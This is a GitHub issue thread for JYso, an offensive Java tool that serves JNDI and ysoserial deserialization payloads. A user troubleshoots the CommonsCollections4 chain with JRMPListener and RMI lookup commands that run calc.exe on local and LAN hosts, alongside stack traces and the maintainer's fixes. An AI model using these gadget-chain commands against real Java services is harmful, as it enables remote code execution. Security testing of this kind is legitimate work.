qi4L / JYso

It can be either a JNDIExploit or a ysoserial.
GNU General Public License v3.0

How do I test the CC4 chain? I read the wiki but still can't use it. #48

Closed wgf4242 closed 1 month ago

wgf4242 commented 1 month ago

Start:

java -jar JYso-1.3.1.jar -j -i 127.0.0.1

Is this how calc gets executed? Naming.lookup("rmi://127.0.0.1:1099/Deserialization/CommonsCollections4/command/Base64/Y2FsYw==");

It doesn't work. I tested with ysoserial and that works fine: java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 calc.exe Naming.lookup("rmi://192.168.50.161:1099/test");

[+] LDAP Server Start Listening on >>1389...
[+] HTTP Server Start Listening on >>3456...
[+] RMI  Server Start Listening on >>1099...
[+] Have connection from /127.0.0.1:52795
[+] RMI服务器 >> 正在读取信息
[+] RMI服务器 >> RMI 查询Deserialization/CommonsCollections4/command/Base64/Y2FsYw== 2
Closing connection
Exception in thread "main" java.lang.IllegalAccessError: class com.qi4l.jndi.RMIServer (in unnamed module @0x5e316c74) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x5e316c74
        at com.qi4l.jndi.RMIServer.handleRMI(RMIServer.java:267)
        at com.qi4l.jndi.RMIServer.doCall(RMIServer.java:241)
        at com.qi4l.jndi.RMIServer.doMessage(RMIServer.java:193)
        at com.qi4l.jndi.RMIServer.run(RMIServer.java:146)
        at com.qi4l.jndi.RMIServer.start(RMIServer.java:62)
        at com.qi4l.jndi.Starter.main(Starter.java:25)

qi4L commented 1 month ago

There is no Deserialization route in RMI...

qi4L commented 1 month ago

java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe

wgf4242 commented 1 month ago

openjdk version "17.0.11" 2024-04-16

java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe

java -cp JYso-1.3.1.jar -y com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:61486
Reading message...
Sending return with payload for obj [0:0:0, 0]
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at com.qi4l.jndi.gadgets.utils.Reflections.setAccessible(Reflections.java:13)
        at com.qi4l.jndi.gadgets.utils.Reflections.getField(Reflections.java:20)
        at com.qi4l.jndi.gadgets.utils.Reflections.setFieldValue(Reflections.java:29)
        at com.qi4l.jndi.exploit.JRMPListener.doCall(JRMPListener.java:275)
        at com.qi4l.jndi.exploit.JRMPListener.doMessage(JRMPListener.java:217)
        at com.qi4l.jndi.exploit.JRMPListener.run(JRMPListener.java:171)
        at com.qi4l.jndi.exploit.JRMPListener.main(JRMPListener.java:80)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)

Doesn't work. It throws this error.

qi4L commented 1 month ago

Use JDK 1.8, or recompile it with JDK 17.

wgf4242 commented 1 month ago

> Use JDK 1.8, or recompile it with JDK 17.

F:\>java -version
java version "1.8.0_51"
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) 64-Bit Server VM (build 25.51-b03, mixed mode)
F:\downloads>java -cp JYso-1.3.0.jar com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:62615
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection

Also didn't succeed.

qi4L commented 1 month ago

This is clearly not a problem on my side.

wgf4242 commented 1 month ago

> This is clearly not a problem on my side.

I copied your command and forgot to change it.. changed it.. still didn't succeed.

qi4L commented 1 month ago

There was indeed a problem; fixed. Thanks for the feedback.

qi4L commented 1 month ago

(image attachment)